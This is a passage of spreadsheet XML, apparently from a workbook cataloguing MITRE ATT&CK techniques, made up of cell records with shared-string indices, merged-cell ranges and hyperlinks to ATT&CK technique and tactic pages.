        <v>981</v>
      </c>
      <c r="E656" s="18"/>
      <c r="F656" s="22"/>
      <c r="G656" s="22"/>
      <c r="H656" s="22"/>
      <c r="I656" s="22"/>
      <c r="J656" s="22"/>
      <c r="K656" s="35" t="s">
        <v>982</v>
      </c>
    </row>
    <row r="657" spans="1:11" ht="41.4" x14ac:dyDescent="0.3">
      <c r="A657" s="9">
        <v>180</v>
      </c>
      <c r="B657" s="167"/>
      <c r="C657" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D657" s="170"/>
      <c r="E657" s="16"/>
      <c r="F657" s="23"/>
      <c r="G657" s="23"/>
      <c r="H657" s="23"/>
      <c r="I657" s="23"/>
      <c r="J657" s="23"/>
      <c r="K657" s="33" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="658" spans="1:11" x14ac:dyDescent="0.3">
      <c r="B658" s="167"/>
      <c r="C658" s="2" t="s">
        <v>205</v>
      </c>
      <c r="D658" s="170"/>
      <c r="E658" s="16"/>
      <c r="F658" s="23"/>
      <c r="G658" s="23"/>
      <c r="H658" s="23"/>
      <c r="I658" s="23"/>
      <c r="J658" s="23"/>
      <c r="K658" s="33" t="s">
        <v>984</v>
      </c>
    </row>
    <row r="659" spans="1:11" ht="29.4" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B659" s="168"/>
      <c r="C659" s="8" t="s">
        <v>0</v>
      </c>
      <c r="D659" s="171"/>
      <c r="E659" s="15"/>
      <c r="F659" s="23"/>
      <c r="G659" s="23"/>
      <c r="H659" s="23"/>
      <c r="I659" s="23"/>
      <c r="J659" s="23"/>
      <c r="K659" s="31" t="s">
        <v>985</v>
      </c>
    </row>
    <row r="660" spans="1:11" ht="27.6" x14ac:dyDescent="0.3">
      <c r="B660" s="166" t="s">
        <v>168</v>
      </c>
      <c r="C660" s="172" t="s">
        <v>7</v>
      </c>
      <c r="D660" s="169" t="s">
        <v>986</v>
      </c>
      <c r="E660" s="18"/>
      <c r="F660" s="22"/>
      <c r="G660" s="22"/>
      <c r="H660" s="22"/>
      <c r="I660" s="22"/>
      <c r="J660" s="22"/>
      <c r="K660" s="35" t="s">
        <v>987</v>
      </c>
    </row>
    <row r="661" spans="1:11" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A661" s="9">
        <v>181</v>
      </c>
      <c r="B661" s="167"/>
      <c r="C661" s="173"/>
      <c r="D661" s="170"/>
      <c r="E661" s="15"/>
      <c r="F661" s="23"/>
      <c r="G661" s="23"/>
      <c r="H661" s="23"/>
      <c r="I661" s="23"/>
      <c r="J661" s="23"/>
      <c r="K661" s="31" t="s">
        <v>988</v>
      </c>
    </row>
    <row r="662" spans="1:11" ht="15" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B662" s="168"/>
      <c r="C662" s="174"/>
      <c r="D662" s="171"/>
      <c r="E662" s="15"/>
      <c r="F662" s="23"/>
      <c r="G662" s="23"/>
      <c r="H662" s="23"/>
      <c r="I662" s="23"/>
      <c r="J662" s="23"/>
      <c r="K662" s="31" t="s">
        <v>989</v>
      </c>
    </row>
    <row r="663" spans="1:11" ht="28.8" x14ac:dyDescent="0.3">
      <c r="B663" s="166" t="s">
        <v>112</v>
      </c>
      <c r="C663" s="1" t="s">
        <v>196</v>
      </c>
      <c r="D663" s="169" t="s">
        <v>990</v>
      </c>
      <c r="E663" s="18"/>
      <c r="F663" s="22"/>
      <c r="G663" s="22"/>
      <c r="H663" s="22"/>
      <c r="I663" s="22"/>
      <c r="J663" s="22"/>
      <c r="K663" s="35" t="s">
        <v>991</v>
      </c>
    </row>
    <row r="664" spans="1:11" ht="27.6" x14ac:dyDescent="0.3">
      <c r="A664" s="9">
        <v>182</v>
      </c>
      <c r="B664" s="167"/>
      <c r="C664" s="2" t="s">
        <v>4</v>
      </c>
      <c r="D664" s="170"/>
      <c r="E664" s="16"/>
      <c r="F664" s="23"/>
      <c r="G664" s="23"/>
      <c r="H664" s="23"/>
      <c r="I664" s="23"/>
      <c r="J664" s="23"/>
      <c r="K664" s="33" t="s">
        <v>992</v>
      </c>
    </row>
    <row r="665" spans="1:11" ht="41.4" x14ac:dyDescent="0.3">
      <c r="B665" s="167"/>
      <c r="C665" s="3"/>
      <c r="D665" s="170"/>
      <c r="E665" s="16"/>
      <c r="F665" s="23"/>
      <c r="G665" s="23"/>
      <c r="H665" s="23"/>
      <c r="I665" s="23"/>
      <c r="J665" s="23"/>
      <c r="K665" s="33" t="s">
        <v>993</v>
      </c>
    </row>
    <row r="666" spans="1:11" ht="28.2" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B666" s="168"/>
      <c r="C666" s="4"/>
      <c r="D666" s="171"/>
      <c r="E666" s="17"/>
      <c r="F666" s="24"/>
      <c r="G666" s="24"/>
      <c r="H666" s="24"/>
      <c r="I666" s="24"/>
      <c r="J666" s="24"/>
      <c r="K666" s="34" t="s">
        <v>994</v>
      </c>
    </row>
    <row r="667" spans="1:11" ht="26.25" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A667" s="9">
        <v>183</v>
      </c>
      <c r="B667" s="166" t="s">
        <v>79</v>
      </c>
      <c r="C667" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D667" s="169" t="s">
        <v>995</v>
      </c>
      <c r="E667" s="18"/>
      <c r="F667" s="22"/>
      <c r="G667" s="22"/>
      <c r="H667" s="22"/>
      <c r="I667" s="22"/>
      <c r="J667" s="22"/>
      <c r="K667" s="164" t="s">
        <v>996</v>
      </c>
    </row>
    <row r="668" spans="1:11" ht="15" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B668" s="168"/>
      <c r="C668" s="8" t="s">
        <v>205</v>
      </c>
      <c r="D668" s="171"/>
      <c r="E668" s="17"/>
      <c r="F668" s="24"/>
      <c r="G668" s="24"/>
      <c r="H668" s="24"/>
      <c r="I668" s="24"/>
      <c r="J668" s="24"/>
      <c r="K668" s="165"/>
    </row>
    <row r="669" spans="1:11" ht="28.2" x14ac:dyDescent="0.3">
      <c r="B669" s="166" t="s">
        <v>156</v>
      </c>
      <c r="C669" s="172" t="s">
        <v>6</v>
      </c>
      <c r="D669" s="169" t="s">
        <v>997</v>
      </c>
      <c r="E669" s="18"/>
      <c r="F669" s="22"/>
      <c r="G669" s="22"/>
      <c r="H669" s="22"/>
      <c r="I669" s="22"/>
      <c r="J669" s="22"/>
      <c r="K669" s="35" t="s">
        <v>998</v>
      </c>
    </row>
    <row r="670" spans="1:11" ht="55.2" x14ac:dyDescent="0.3">
      <c r="A670" s="9">
        <v>184</v>
      </c>
      <c r="B670" s="167"/>
      <c r="C670" s="173"/>
      <c r="D670" s="170"/>
      <c r="E670" s="16"/>
      <c r="F670" s="23"/>
      <c r="G670" s="23"/>
      <c r="H670" s="23"/>
      <c r="I670" s="23"/>
      <c r="J670" s="23"/>
      <c r="K670" s="33" t="s">
        <v>999</v>
      </c>
    </row>
    <row r="671" spans="1:11" ht="15" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B671" s="168"/>
      <c r="C671" s="174"/>
      <c r="D671" s="171"/>
      <c r="E671" s="17"/>
      <c r="F671" s="24"/>
      <c r="G671" s="24"/>
      <c r="H671" s="24"/>
      <c r="I671" s="24"/>
      <c r="J671" s="24"/>
      <c r="K671" s="34" t="s">
        <v>1000</v>
      </c>
    </row>
    <row r="672" spans="1:11" ht="42" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A672" s="9">
        <v>185</v>
      </c>
      <c r="B672" s="14" t="s">
        <v>42</v>
      </c>
      <c r="C672" s="7" t="s">
        <v>1</v>
      </c>
      <c r="D672" s="10" t="s">
        <v>1001</v>
      </c>
      <c r="E672" s="19"/>
      <c r="F672" s="25"/>
      <c r="G672" s="25"/>
      <c r="H672" s="25"/>
      <c r="I672" s="25"/>
      <c r="J672" s="25"/>
      <c r="K672" s="39" t="s">
        <v>1002</v>
      </c>
    </row>
    <row r="673" spans="1:11" ht="43.8" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A673" s="9">
        <v>186</v>
      </c>
      <c r="B673" s="14" t="s">
        <v>80</v>
      </c>
      <c r="C673" s="7" t="s">
        <v>2</v>
      </c>
      <c r="D673" s="10" t="s">
        <v>1003</v>
      </c>
      <c r="E673" s="19"/>
      <c r="F673" s="25"/>
      <c r="G673" s="25"/>
      <c r="H673" s="25"/>
      <c r="I673" s="25"/>
      <c r="J673" s="25"/>
      <c r="K673" s="39" t="s">
        <v>1004</v>
      </c>
    </row>
    <row r="674" spans="1:11" x14ac:dyDescent="0.3">
      <c r="B674" s="166" t="s">
        <v>43</v>
      </c>
      <c r="C674" s="1" t="s">
        <v>1</v>
      </c>
      <c r="D674" s="169" t="s">
        <v>1005</v>
      </c>
      <c r="E674" s="18"/>
      <c r="F674" s="22"/>
      <c r="G674" s="22"/>
      <c r="H674" s="22"/>
      <c r="I674" s="22"/>
      <c r="J674" s="22"/>
      <c r="K674" s="164" t="s">
        <v>1006</v>
      </c>
    </row>
    <row r="675" spans="1:11" ht="15" thickBot="1" x14ac:dyDescent="0.35">
      <c r="A675" s="9">
        <v>187</v>
      </c>
      <c r="B675" s="168"/>
      <c r="C675" s="8" t="s">
        <v>6</v>
      </c>
      <c r="D675" s="171"/>
      <c r="E675" s="17"/>
      <c r="F675" s="24"/>
      <c r="G675" s="24"/>
      <c r="H675" s="24"/>
      <c r="I675" s="24"/>
      <c r="J675" s="24"/>
      <c r="K675" s="165"/>
    </row>
    <row r="676" spans="1:11" ht="43.2" x14ac:dyDescent="0.3">
      <c r="B676" s="166" t="s">
        <v>81</v>
      </c>
      <c r="C676" s="172" t="s">
        <v>2</v>
      </c>
      <c r="D676" s="169" t="s">
        <v>1007</v>
      </c>
      <c r="E676" s="15"/>
      <c r="F676" s="23"/>
      <c r="G676" s="23"/>
      <c r="H676" s="23"/>
      <c r="I676" s="23"/>
      <c r="J676" s="23"/>
      <c r="K676" s="31" t="s">
        <v>1008</v>
      </c>
    </row>
    <row r="677" spans="1:11" x14ac:dyDescent="0.3">
      <c r="A677" s="9">
        <v>190</v>
      </c>
      <c r="B677" s="167"/>
      <c r="C677" s="173"/>
      <c r="D677" s="170"/>
      <c r="E677" s="15"/>
      <c r="F677" s="23"/>
      <c r="G677" s="23"/>
      <c r="H677" s="23"/>
      <c r="I677" s="23"/>
      <c r="J677" s="23"/>
      <c r="K677" s="31" t="s">
        <v>1009</v>
      </c>
    </row>
    <row r="678" spans="1:11" x14ac:dyDescent="0.3">
      <c r="B678" s="167"/>
      <c r="C678" s="173"/>
      <c r="D678" s="170"/>
      <c r="E678" s="16"/>
      <c r="F678" s="23"/>
      <c r="G678" s="23"/>
      <c r="H678" s="23"/>
      <c r="I678" s="23"/>
      <c r="J678" s="23"/>
      <c r="K678" s="36" t="s">
        <v>1010</v>
      </c>
    </row>
    <row r="679" spans="1:11" x14ac:dyDescent="0.3">
      <c r="B679" s="167"/>
      <c r="C679" s="173"/>
      <c r="D679" s="170"/>
      <c r="E679" s="16"/>
      <c r="F679" s="23"/>
      <c r="G679" s="23"/>
      <c r="H679" s="23"/>
      <c r="I679" s="23"/>
      <c r="J679" s="23"/>
      <c r="K679" s="36" t="s">
        <v>1011</v>
      </c>
    </row>
    <row r="680" spans="1:11" x14ac:dyDescent="0.3">
      <c r="B680" s="167"/>
      <c r="C680" s="173"/>
      <c r="D680" s="170"/>
      <c r="E680" s="16"/>
      <c r="F680" s="23"/>
      <c r="G680" s="23"/>
      <c r="H680" s="23"/>
      <c r="I680" s="23"/>
      <c r="J680" s="23"/>
      <c r="K680" s="36" t="s">
        <v>1012</v>
      </c>
    </row>
    <row r="681" spans="1:11" ht="15" thickBot="1" x14ac:dyDescent="0.35">
      <c r="B681" s="177"/>
      <c r="C681" s="178"/>
      <c r="D681" s="179"/>
      <c r="E681" s="20"/>
      <c r="F681" s="26"/>
      <c r="G681" s="26"/>
      <c r="H681" s="26"/>
      <c r="I681" s="26"/>
      <c r="J681" s="26"/>
      <c r="K681" s="46" t="s">
        <v>1013</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="284">
    <mergeCell ref="B676:B681"/>
    <mergeCell ref="C676:C681"/>
    <mergeCell ref="D676:D681"/>
    <mergeCell ref="K667:K668"/>
    <mergeCell ref="B669:B671"/>
    <mergeCell ref="C669:C671"/>
    <mergeCell ref="D669:D671"/>
    <mergeCell ref="B674:B675"/>
    <mergeCell ref="D674:D675"/>
    <mergeCell ref="K674:K675"/>
    <mergeCell ref="B660:B662"/>
    <mergeCell ref="C660:C662"/>
    <mergeCell ref="D660:D662"/>
    <mergeCell ref="B663:B666"/>
    <mergeCell ref="D663:D666"/>
    <mergeCell ref="B667:B668"/>
    <mergeCell ref="D667:D668"/>
    <mergeCell ref="B632:B648"/>
    <mergeCell ref="D632:D648"/>
    <mergeCell ref="B650:B653"/>
    <mergeCell ref="C650:C653"/>
    <mergeCell ref="D650:D653"/>
    <mergeCell ref="B656:B659"/>
    <mergeCell ref="D656:D659"/>
    <mergeCell ref="B616:B621"/>
    <mergeCell ref="C616:C621"/>
    <mergeCell ref="D616:D621"/>
    <mergeCell ref="B625:B627"/>
    <mergeCell ref="D625:D627"/>
    <mergeCell ref="B628:B630"/>
    <mergeCell ref="C628:C630"/>
    <mergeCell ref="D628:D630"/>
    <mergeCell ref="B605:B609"/>
    <mergeCell ref="C605:C609"/>
    <mergeCell ref="D605:D609"/>
    <mergeCell ref="B611:B615"/>
    <mergeCell ref="C611:C615"/>
    <mergeCell ref="D611:D615"/>
    <mergeCell ref="B588:B590"/>
    <mergeCell ref="C588:C590"/>
    <mergeCell ref="D588:D590"/>
    <mergeCell ref="B594:B603"/>
    <mergeCell ref="C594:C603"/>
    <mergeCell ref="D594:D603"/>
    <mergeCell ref="B570:B572"/>
    <mergeCell ref="D570:D572"/>
    <mergeCell ref="B575:B581"/>
    <mergeCell ref="D575:D581"/>
    <mergeCell ref="B582:B584"/>
    <mergeCell ref="D582:D584"/>
    <mergeCell ref="B554:B559"/>
    <mergeCell ref="C554:C559"/>
    <mergeCell ref="D554:D559"/>
    <mergeCell ref="B560:B562"/>
    <mergeCell ref="D560:D562"/>
    <mergeCell ref="B563:B567"/>
    <mergeCell ref="C563:C567"/>
    <mergeCell ref="D563:D567"/>
    <mergeCell ref="B545:B547"/>
    <mergeCell ref="D545:D547"/>
    <mergeCell ref="K545:K547"/>
    <mergeCell ref="B549:B553"/>
    <mergeCell ref="C549:C553"/>
    <mergeCell ref="D549:D553"/>
    <mergeCell ref="B529:B531"/>
    <mergeCell ref="D529:D531"/>
    <mergeCell ref="K529:K531"/>
    <mergeCell ref="B533:B535"/>
    <mergeCell ref="D533:D535"/>
    <mergeCell ref="B537:B544"/>
    <mergeCell ref="D537:D544"/>
    <mergeCell ref="B519:B520"/>
    <mergeCell ref="D519:D520"/>
    <mergeCell ref="K519:K520"/>
    <mergeCell ref="B522:B528"/>
    <mergeCell ref="C522:C528"/>
    <mergeCell ref="D522:D528"/>
    <mergeCell ref="B509:B512"/>
    <mergeCell ref="D509:D512"/>
    <mergeCell ref="B513:B515"/>
    <mergeCell ref="C513:C515"/>
    <mergeCell ref="D513:D515"/>
    <mergeCell ref="B516:B518"/>
    <mergeCell ref="C516:C518"/>
    <mergeCell ref="D516:D518"/>
    <mergeCell ref="B488:B502"/>
    <mergeCell ref="D488:D502"/>
    <mergeCell ref="B504:B505"/>
    <mergeCell ref="D504:D505"/>
    <mergeCell ref="K504:K505"/>
    <mergeCell ref="B507:B508"/>
    <mergeCell ref="D507:D508"/>
    <mergeCell ref="K507:K508"/>
    <mergeCell ref="B474:B478"/>
    <mergeCell ref="C474:C478"/>
    <mergeCell ref="D474:D478"/>
    <mergeCell ref="B479:B486"/>
    <mergeCell ref="C479:C486"/>
    <mergeCell ref="D479:D486"/>
    <mergeCell ref="B466:B469"/>
    <mergeCell ref="C466:C469"/>
    <mergeCell ref="D466:D469"/>
    <mergeCell ref="B470:B473"/>
    <mergeCell ref="C470:C473"/>
    <mergeCell ref="D470:D473"/>
    <mergeCell ref="B441:B451"/>
    <mergeCell ref="D441:D451"/>
    <mergeCell ref="B453:B459"/>
    <mergeCell ref="C453:C459"/>
    <mergeCell ref="D453:D459"/>
    <mergeCell ref="B460:B465"/>
    <mergeCell ref="D460:D465"/>
    <mergeCell ref="B428:B430"/>
    <mergeCell ref="C428:C430"/>
    <mergeCell ref="D428:D430"/>
    <mergeCell ref="B431:B440"/>
    <mergeCell ref="C431:C440"/>
    <mergeCell ref="D431:D440"/>
    <mergeCell ref="B410:B422"/>
    <mergeCell ref="C410:C422"/>
    <mergeCell ref="D410:D422"/>
    <mergeCell ref="B424:B427"/>
    <mergeCell ref="C424:C427"/>
    <mergeCell ref="D424:D427"/>
    <mergeCell ref="B403:B404"/>
    <mergeCell ref="D403:D404"/>
    <mergeCell ref="K403:K404"/>
    <mergeCell ref="B405:B409"/>
    <mergeCell ref="C405:C409"/>
    <mergeCell ref="D405:D409"/>
    <mergeCell ref="B390:B392"/>
    <mergeCell ref="C390:C392"/>
    <mergeCell ref="D390:D392"/>
    <mergeCell ref="B395:B401"/>
    <mergeCell ref="C395:C401"/>
    <mergeCell ref="D395:D401"/>
    <mergeCell ref="B375:B377"/>
    <mergeCell ref="C375:C377"/>
    <mergeCell ref="D375:D377"/>
    <mergeCell ref="B378:B382"/>
    <mergeCell ref="D378:D382"/>
    <mergeCell ref="B383:B385"/>
    <mergeCell ref="C383:C385"/>
    <mergeCell ref="D383:D385"/>
    <mergeCell ref="B363:B371"/>
    <mergeCell ref="C363:C371"/>
    <mergeCell ref="D363:D371"/>
    <mergeCell ref="B372:B374"/>
    <mergeCell ref="C372:C374"/>
    <mergeCell ref="D372:D374"/>
    <mergeCell ref="B353:B354"/>
    <mergeCell ref="D353:D354"/>
    <mergeCell ref="K353:K354"/>
    <mergeCell ref="B355:B359"/>
    <mergeCell ref="D355:D359"/>
    <mergeCell ref="B360:B362"/>
    <mergeCell ref="C360:C362"/>
    <mergeCell ref="D360:D362"/>
    <mergeCell ref="K344:K345"/>
    <mergeCell ref="B346:B349"/>
    <mergeCell ref="C346:C349"/>
    <mergeCell ref="D346:D349"/>
    <mergeCell ref="B350:B352"/>
    <mergeCell ref="C350:C352"/>
    <mergeCell ref="D350:D352"/>
    <mergeCell ref="B335:B338"/>
    <mergeCell ref="D335:D338"/>
    <mergeCell ref="B339:B343"/>
    <mergeCell ref="C339:C343"/>
    <mergeCell ref="D339:D343"/>
    <mergeCell ref="B344:B345"/>
    <mergeCell ref="D344:D345"/>
    <mergeCell ref="B310:B317"/>
    <mergeCell ref="D310:D317"/>
    <mergeCell ref="B318:B325"/>
    <mergeCell ref="D318:D325"/>
    <mergeCell ref="B327:B330"/>
    <mergeCell ref="D327:D330"/>
    <mergeCell ref="B298:B302"/>
    <mergeCell ref="C298:C302"/>
    <mergeCell ref="D298:D302"/>
    <mergeCell ref="B303:B307"/>
    <mergeCell ref="C303:C307"/>
    <mergeCell ref="D303:D307"/>
    <mergeCell ref="B281:B284"/>
    <mergeCell ref="C281:C284"/>
    <mergeCell ref="D281:D284"/>
    <mergeCell ref="B286:B288"/>
    <mergeCell ref="D286:D288"/>
    <mergeCell ref="B292:B297"/>
    <mergeCell ref="D292:D297"/>
    <mergeCell ref="B258:B264"/>
    <mergeCell ref="C258:C264"/>
    <mergeCell ref="D258:D264"/>
    <mergeCell ref="B270:B277"/>
    <mergeCell ref="C270:C277"/>
    <mergeCell ref="D270:D277"/>
    <mergeCell ref="B241:B244"/>
    <mergeCell ref="C241:C244"/>
    <mergeCell ref="D241:D244"/>
    <mergeCell ref="B245:B257"/>
    <mergeCell ref="C245:C257"/>
    <mergeCell ref="D245:D257"/>
    <mergeCell ref="B224:B237"/>
    <mergeCell ref="C224:C237"/>
    <mergeCell ref="D224:D237"/>
    <mergeCell ref="B238:B240"/>
    <mergeCell ref="C238:C240"/>
    <mergeCell ref="D238:D240"/>
    <mergeCell ref="B215:B218"/>
    <mergeCell ref="C215:C218"/>
    <mergeCell ref="D215:D218"/>
    <mergeCell ref="B220:B222"/>
    <mergeCell ref="C220:C222"/>
    <mergeCell ref="D220:D222"/>
    <mergeCell ref="B182:B184"/>
    <mergeCell ref="C182:C184"/>
    <mergeCell ref="D182:D184"/>
    <mergeCell ref="B185:B189"/>
    <mergeCell ref="D185:D189"/>
    <mergeCell ref="B197:B211"/>
    <mergeCell ref="C197:C211"/>
    <mergeCell ref="D197:D211"/>
    <mergeCell ref="B174:B177"/>
    <mergeCell ref="C174:C177"/>
    <mergeCell ref="D174:D177"/>
    <mergeCell ref="B179:B181"/>
    <mergeCell ref="C179:C181"/>
    <mergeCell ref="D179:D181"/>
    <mergeCell ref="B111:B113"/>
    <mergeCell ref="C111:C113"/>
    <mergeCell ref="D111:D113"/>
    <mergeCell ref="B114:B116"/>
    <mergeCell ref="D114:D116"/>
    <mergeCell ref="B118:B172"/>
    <mergeCell ref="C118:C172"/>
    <mergeCell ref="D118:D172"/>
    <mergeCell ref="B107:B108"/>
    <mergeCell ref="D107:D108"/>
    <mergeCell ref="K107:K108"/>
    <mergeCell ref="B109:B110"/>
    <mergeCell ref="D109:D110"/>
    <mergeCell ref="K109:K110"/>
    <mergeCell ref="B92:B94"/>
    <mergeCell ref="C92:C94"/>
    <mergeCell ref="D92:D94"/>
    <mergeCell ref="B96:B105"/>
    <mergeCell ref="C96:C105"/>
    <mergeCell ref="D96:D105"/>
    <mergeCell ref="B81:B86"/>
    <mergeCell ref="C81:C86"/>
    <mergeCell ref="D81:D86"/>
    <mergeCell ref="B87:B91"/>
    <mergeCell ref="C87:C91"/>
    <mergeCell ref="D87:D91"/>
    <mergeCell ref="B69:B72"/>
    <mergeCell ref="C69:C72"/>
    <mergeCell ref="D69:D72"/>
    <mergeCell ref="B73:B77"/>
    <mergeCell ref="D73:D77"/>
    <mergeCell ref="B78:B80"/>
    <mergeCell ref="D78:D80"/>
    <mergeCell ref="B54:B57"/>
    <mergeCell ref="D54:D57"/>
    <mergeCell ref="B59:B64"/>
    <mergeCell ref="C59:C64"/>
    <mergeCell ref="D59:D64"/>
    <mergeCell ref="B65:B67"/>
    <mergeCell ref="C65:C67"/>
    <mergeCell ref="D65:D67"/>
    <mergeCell ref="B32:B38"/>
    <mergeCell ref="D32:D38"/>
    <mergeCell ref="B39:B40"/>
    <mergeCell ref="D39:D40"/>
    <mergeCell ref="K39:K40"/>
    <mergeCell ref="B42:B48"/>
    <mergeCell ref="D42:D48"/>
    <mergeCell ref="B4:B11"/>
    <mergeCell ref="D4:D11"/>
    <mergeCell ref="B12:B22"/>
    <mergeCell ref="D12:D22"/>
    <mergeCell ref="B23:B30"/>
    <mergeCell ref="C23:C30"/>
    <mergeCell ref="D23:D30"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="B3" r:id="rId1" tooltip="Property:Has link text" display="https://attack.mitre.org/wiki/Property:Has_link_text"/>
    <hyperlink ref="C3" r:id="rId2" tooltip="Property:Has tactic" display="https://attack.mitre.org/wiki/Property:Has_tactic"/>
    <hyperlink ref="D3" r:id="rId3" tooltip="Property:Has ID" display="https://attack.mitre.org/wiki/Property:Has_ID"/>
    <hyperlink ref="K3" r:id="rId4" tooltip="Property:Has technical description" display="https://attack.mitre.org/wiki/Property:Has_technical_description"/>
    <hyperlink ref="B4" r:id="rId5" tooltip="Technique/T1134" display="https://attack.mitre.org/wiki/Technique/T1134"/>
    <hyperlink ref="C4" r:id="rId6" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C5" r:id="rId7" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B12" r:id="rId8" tooltip="Technique/T1015" display="https://attack.mitre.org/wiki/Technique/T1015"/>
    <hyperlink ref="C12" r:id="rId9" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C13" r:id="rId10" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B23" r:id="rId11" tooltip="Technique/T1087" display="https://attack.mitre.org/wiki/Technique/T1087"/>
    <hyperlink ref="C23" r:id="rId12" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B31" r:id="rId13" tooltip="Technique/T1098" display="https://attack.mitre.org/wiki/Technique/T1098"/>
    <hyperlink ref="C31" r:id="rId14" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B32" r:id="rId15" tooltip="Technique/T1182" display="https://attack.mitre.org/wiki/Technique/T1182"/>
    <hyperlink ref="C32" r:id="rId16" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C33" r:id="rId17" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B39" r:id="rId18" tooltip="Technique/T1103" display="https://attack.mitre.org/wiki/Technique/T1103"/>
    <hyperlink ref="C39" r:id="rId19" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C40" r:id="rId20" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B41" r:id="rId21" tooltip="Technique/T1017" display="https://attack.mitre.org/wiki/Technique/T1017"/>
    <hyperlink ref="C41" r:id="rId22" tooltip="Lateral Movement" display="https://attack.mitre.org/wiki/Lateral_Movement"/>
    <hyperlink ref="B42" r:id="rId23" tooltip="Technique/T1138" display="https://attack.mitre.org/wiki/Technique/T1138"/>
    <hyperlink ref="C42" r:id="rId24" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="C43" r:id="rId25" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B49" r:id="rId26" tooltip="Technique/T1010" display="https://attack.mitre.org/wiki/Technique/T1010"/>
    <hyperlink ref="C49" r:id="rId27" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B50" r:id="rId28" tooltip="Technique/T1123" display="https://attack.mitre.org/wiki/Technique/T1123"/>
    <hyperlink ref="C50" r:id="rId29" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B51" r:id="rId30" tooltip="Technique/T1131" display="https://attack.mitre.org/wiki/Technique/T1131"/>
    <hyperlink ref="C51" r:id="rId31" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B52" r:id="rId32" tooltip="Technique/T1119" display="https://attack.mitre.org/wiki/Technique/T1119"/>
    <hyperlink ref="C52" r:id="rId33" tooltip="Collection" display="https://attack.mitre.org/wiki/Collection"/>
    <hyperlink ref="B53" r:id="rId34" tooltip="Technique/T1020" display="https://attack.mitre.org/wiki/Technique/T1020"/>
    <hyperlink ref="C53" r:id="rId35" tooltip="Exfiltration" display="https://attack.mitre.org/wiki/Exfiltration"/>
    <hyperlink ref="B54" r:id="rId36" tooltip="Technique/T1197" display="https://attack.mitre.org/wiki/Technique/T1197"/>
    <hyperlink ref="C54" r:id="rId37" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C55" r:id="rId38" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B58" r:id="rId39" tooltip="Technique/T1009" display="https://attack.mitre.org/wiki/Technique/T1009"/>
    <hyperlink ref="C58" r:id="rId40" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="B59" r:id="rId41" tooltip="Technique/T1067" display="https://attack.mitre.org/wiki/Technique/T1067"/>
    <hyperlink ref="C59" r:id="rId42" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B65" r:id="rId43" tooltip="Technique/T1217" display="https://attack.mitre.org/wiki/Technique/T1217"/>
    <hyperlink ref="C65" r:id="rId44" tooltip="Discovery" display="https://attack.mitre.org/wiki/Discovery"/>
    <hyperlink ref="B68" r:id="rId45" tooltip="Technique/T1176" display="https://attack.mitre.org/wiki/Technique/T1176"/>
    <hyperlink ref="C68" r:id="rId46" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B69" r:id="rId47" tooltip="Technique/T1110" display="https://attack.mitre.org/wiki/Technique/T1110"/>
    <hyperlink ref="C69" r:id="rId48" tooltip="Credential Access" display="https://attack.mitre.org/wiki/Credential_Access"/>
    <hyperlink ref="B73" r:id="rId49" tooltip="Technique/T1088" display="https://attack.mitre.org/wiki/Technique/T1088"/>
    <hyperlink ref="C73" r:id="rId50" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C74" r:id="rId51" tooltip="Privilege Escalation" display="https://attack.mitre.org/wiki/Privilege_Escalation"/>
    <hyperlink ref="B78" r:id="rId52" tooltip="Technique/T1191" display="https://attack.mitre.org/wiki/Technique/T1191"/>
    <hyperlink ref="C78" r:id="rId53" tooltip="Defense Evasion" display="https://attack.mitre.org/wiki/Defense_Evasion"/>
    <hyperlink ref="C79" r:id="rId54" tooltip="Execution" display="https://attack.mitre.org/wiki/Execution"/>
    <hyperlink ref="B81" r:id="rId55" tooltip="Technique/T1042" display="https://attack.mitre.org/wiki/Technique/T1042"/>
    <hyperlink ref="C81" r:id="rId56" tooltip="Persistence" display="https://attack.mitre.org/wiki/Persistence"/>
    <hyperlink ref="B87" r:id="rId57" tooltip="Technique/T1115" display="https://attack.mitre.org/wiki/Technique/T1115"/>
